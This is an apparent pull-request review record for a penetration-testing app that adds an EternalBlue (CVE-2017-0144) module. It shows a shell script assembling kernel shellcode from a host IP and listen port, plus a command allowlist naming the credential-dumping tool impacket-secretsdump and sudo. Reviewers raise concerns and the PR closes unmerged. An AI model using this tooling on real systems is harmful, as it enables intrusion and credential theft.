### PR TITLE
CVE 2017 0144 eternal blue

### PR DESCRIPTION
**Pull request by tjmat1**
Creating another pull request as had issues updating branch with GIT. 

-changes requested from last pull request implemented

### CODE REVIEW

File: src-tauri/exploits/CVE-2017-0144/Shellcode/create_shell.sh [hunk 1]
```diff
@@ -0,0 +1,21 @@
+#!/bin/bash
+set -e
+
+host_IP=$1
+Listen_port=$2
+
+sudo nasm -f bin /usr/share/ddt/CVE-2017-0144/Shellcode/eternalblue_kshellcode_x64.asm -o /usr/share/ddt/CVE-2017-0144/sc_x64_kernel.bin
```
Comment (Huskehhh) [inline src-tauri/exploits/CVE-2017-0144/Shellcode/create_shell.sh:7]: Do these need sudo?

File: src-tauri/tauri.conf.json [hunk 2]
```diff
@@ -87,6 +87,11 @@
             "cmd": "impacket-secretsdump",
             "args": true
           },
+          {
+            "name": "sudo",
```
Comment (Huskehhh) [inline src-tauri/tauri.conf.json:91]: I feel a bit sketchy about making sudo an accepted command. And it _usually_ needs credentials which makes life even more difficult.

Comment (Huskehhh) [reply src-tauri/tauri.conf.json:91]: Perhaps we can make assumptions that the application is run as root?

**Comment by JiatengTao** [comment]
Close this PR as it's from T2 2022

**Pull request closed without merging**